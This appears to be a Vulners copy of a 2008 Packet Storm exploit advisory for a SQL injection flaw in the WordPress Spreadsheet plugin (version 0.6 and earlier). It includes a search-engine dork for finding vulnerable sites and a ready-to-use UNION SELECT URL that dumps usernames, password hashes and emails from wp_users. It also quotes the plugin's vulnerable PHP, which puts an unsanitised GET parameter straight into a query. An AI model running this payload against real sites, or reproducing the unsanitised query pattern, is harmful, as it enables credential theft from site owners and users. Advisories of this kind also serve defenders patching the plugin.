Lucene search
K

wpspreadsheet-sql.txt

🗓️ 23 Apr 2008 00:00:00Reported by 1ten0.0net1Type 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 36 Views

sql-injection in WordPress Spreadsheet <= 0.6 Plugin, remote vulnerabilit

Code
`===========================================  
There's standart sql-injection in Spreadsheet <= 0.6 Plugin  
# Author : 1ten0.0net1  
# Script : Wordpress Plugin Spreadsheet <= 0.6 v.  
# Download : http://timrohrer.com/blog/?page_id=71  
# BUG : Remote SQL-Injection Vulnerability  
# Dork : inurl:/wp-content/plugins/wpSS/  
Example:  
http://site.com/wp-content/plugins/wpSS/ss_load.php?ss_id=1+and+(1=0)+union+select+1,concat(user_login,0x3a,user_pass,0x3a,user_email),3,4+from+wp_users--&display=plain  
===========================================  
Vulnerable code:  
ss_load.php  
$id = $_GET['ss_id'];  
....  
ss_functions.php:  
function ss_load ($id, $plain=FALSE) {  
....  
if ($wpdb->query("SELECT * FROM $table_name WHERE id='$id'") == 0) {  
....  
  
==> Visit us @ forum.antichat.ru  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

23 Apr 2008 00:00Current
7.4High risk
Vulners AI Score7.4
36